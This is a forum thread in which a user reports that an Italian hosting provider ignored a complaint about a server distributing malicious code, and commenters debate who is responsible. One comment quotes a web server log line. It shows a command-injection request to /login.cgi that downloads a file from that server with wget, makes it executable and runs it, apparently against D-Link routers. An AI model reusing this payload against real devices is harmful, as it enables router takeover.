Aruba.it blind to malicious code hosting
I tried to notify aruba.it of someone obviously hosting malicious code and trying to attack web servers:
http://80.211.112.150/k
(Reverse DNS resolves to their domain)
Their reaction? 1. in the chat they redirect me to dedicated hosting support form („only way to do it“) 2. Dedicated hosting support just closes my ticket.
Wow!
5 comments
[ 4.5 ms ] story [ 24.1 ms ] threadIf it's a hacked server, the owner has to notice the hack and ask for help cleaning up if necessary. You have no authority whatsoever, and if you attempt to stir up trouble about someone's web site, closing tickets is at the polite end of the response spectrum. You risk prosecution.
If it's a brazen criminal using their own host, they are the customer and the site is working as expected. No customer support required.
> Why don't you contact police or the site owner instead?
Police? Seriously? My police here in germany or the italian police? What do you think will happen? Right: nothing. Site owner? If you can tell me the site owner from an IP... I will do that.
> You risk prosecution.
By telling a service provider that they host malicious content and should do sth. about it? Now that's an interesting view.
> If it's a brazen criminal using their own host [...] No customer support required.
The customer support was the only way to contact the provider. It doesn't matter if they are housing or hosting malicious content. They are at least partly responsible, especially if someone is telling them.
nginx_1 | 197.39.15.48 - - [30/Aug/2018:14:51:22 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.112.150/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks... HTTP/1.1" 400 173 "-" "LMAO/2.0" "-"
Apparently targeting dlink routers - https://twitter.com/txalin/status/1007625620090707974?lang=e...